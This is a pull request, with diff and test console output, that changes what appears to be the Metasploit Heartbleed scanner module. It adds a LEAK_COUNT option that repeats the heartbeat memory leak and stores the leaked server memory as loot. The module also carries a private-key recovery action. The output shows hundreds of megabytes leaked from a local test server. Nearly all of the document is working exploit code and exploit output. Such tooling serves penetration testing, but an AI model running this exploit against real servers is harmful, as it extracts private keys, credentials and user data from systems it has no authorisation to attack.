### PR TITLE
Add LEAK_COUNT option to Heartbleed

### DIFF
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -109,8 +109,12 @@ class MetasploitModule < Msf::Auxiliary
         STARTTLS may also be vulnerable.
 
         The module supports several actions, allowing for scanning, dumping of
-        memory contents, and private key recovery. The `repeat` command can be
-        used to make running the `DUMP` many times more convenient. As in:
+        memory contents to loot, and private key recovery.
+
+        The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.
+
+        The repeat command can be used to make running the SCAN or DUMP many
+        times more powerful. As in:
             repeat -t 60 run; sleep 2
         To run every two seconds for one minute.
       },
@@ -145,7 +149,7 @@ class MetasploitModule < Msf::Auxiliary
       'Actions'        =>
         [
           ['SCAN',  {'Description' => 'Check hosts for vulnerability'}],
-          ['DUMP',  {'Description' => 'Dump memory contents'}],
+          ['DUMP',  {'Description' => 'Dump memory contents to loot'}],
           ['KEYS',  {'Description' => 'Recover private keys from memory'}]
         ],
       'DefaultAction' => 'SCAN',
@@ -161,9 +165,10 @@ class MetasploitModule < Msf::Auxiliary
         OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),
         OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
         OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]),
-        OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]),
+        OptInt.new('STATUS_EVERY', [true, 'How many retries until key dump status', 5]),
         OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),
-        OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10])
+        OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),
+        OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])
       ])
 
     register_advanced_options(
@@ -207,10 +212,17 @@ class MetasploitModule < Msf::Auxiliary
   # Main method
   def run_host(ip)
     case action.name
-      when 'SCAN'
-        loot_and_report(bleed)
-      when 'DUMP'
-        loot_and_report(bleed)  # Scan & Dump are similar, scan() records results
+      # SCAN and DUMP are similar, but DUMP stores loot
+      when 'SCAN', 'DUMP'
+        # 'Tis but a scratch
+        bleeded = ''
+
+        1.upto(leak_count) do |count|
+          vprint_status("Leaking heartbeat response ##{count}")
+          bleeded << (bleed || '')
+        end
+
+        loot_and_report(bleeded)
       when 'KEYS'
         get_keys
       else
@@ -264,6 +276,10 @@ class MetasploitModule < Msf::Auxiliary
 
   def tls_callback
     datastore['TLS_CALLBACK']
+  end
+
+  def leak_count
+    datastore['LEAK_COUNT']
   end
 
   #
@@ -493,13 +509,12 @@ class MetasploitModule < Msf::Auxiliary
 
   # Stores received data
   def loot_and_report(heartbeat_data)
-
-    unless heartbeat_data
+    if heartbeat_data.nil? || heartbeat_data.empty?
       vprint_error("Looks like there isn't leaked information...")
       return
     end
 
-    print_good("Heartbeat response with leak")
+    print_good("Heartbeat response with leak, #{heartbeat_data.length} bytes")
     report_vuln({
       :host => rhost,
       :port => rport,
@@ -541,7 +556,6 @@ class MetasploitModule < Msf::Auxiliary
 
     # Show abbreviated data
     vprint_status("Printable info leaked:\n#{abbreviated_data}")
-
   end
 
   #


### PR DESCRIPTION
I should have done this in 2014, but I'm a slacker.

- [x] Test with `LEAK_COUNT`
- [x] Test with `repeat`

```
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set leak_count 9001
leak_count => 9001
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[+] 127.0.0.1:443         - Heartbeat response with leak, 589880535 bytes
[+] 127.0.0.1:443         - Heartbeat data stored in /Users/wvu/.msf4/loot/20180920171424_default_127.0.0.1_openssl.heartble_551227.bin
[*] 127.0.0.1:443         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) >
```

```
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set leak_count 100
leak_count => 100
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 2 run; sleep 10

[+] 127.0.0.1:443         - Heartbeat response with leak, 6553500 bytes
[+] 127.0.0.1:443         - Heartbeat data stored in /Users/wvu/.msf4/loot/20180920172522_default_127.0.0.1_openssl.heartble_399065.bin
[*] 127.0.0.1:443         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[+] 127.0.0.1:443         - Heartbeat response with leak, 6553500 bytes
[+] 127.0.0.1:443         - Heartbeat data stored in /Users/wvu/.msf4/loot/20180920172535_default_127.0.0.1_openssl.heartble_300407.bin
[*] 127.0.0.1:443         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) >
```

#3206, #10625